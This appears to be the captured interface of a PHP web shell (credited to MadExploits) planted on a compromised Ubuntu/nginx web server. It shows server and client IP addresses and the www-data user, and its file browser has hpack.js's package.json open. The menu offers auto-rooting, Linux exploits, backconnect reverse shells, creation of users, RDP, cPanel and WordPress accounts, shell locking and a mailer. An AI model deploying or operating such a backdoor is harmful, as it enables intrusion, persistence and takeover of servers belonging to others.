Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
hpack.js /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
dr-xr-xr-x
lib
[ DIR ]
dr-xr-xr-x
node_modules
[ DIR ]
dr-xr-xr-x
test
[ DIR ]
dr-xr-xr-x
tools
[ DIR ]
dr-xr-xr-x
.npmignore
28
B
-rw-rw-rw-
.travis.yml
69
B
-rw-rw-rw-
README.md
1.82
KB
-rw-rw-rw-
package.json
744
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "hpack.js", "version": "2.1.6", "description": "HPACK implementation", "main": "lib/hpack.js", "scripts": { "test": "mocha test/*-test.js" }, "repository": { "type": "git", "url": "git+ssh://git@github.com/indutny/hpack.js.git" }, "keywords": [ "HPACK", "HTTP2", "compress", "decompress", "headers" ], "author": "Fedor Indutny <fedor@indutny.com>", "license": "MIT", "bugs": { "url": "https://github.com/indutny/hpack.js/issues" }, "homepage": "https://github.com/indutny/hpack.js#readme", "devDependencies": { "mocha": "^2.2.5" }, "dependencies": { "inherits": "^2.0.1", "obuf": "^1.0.0", "readable-stream": "^2.0.1", "wbuf": "^1.1.0" } }
Close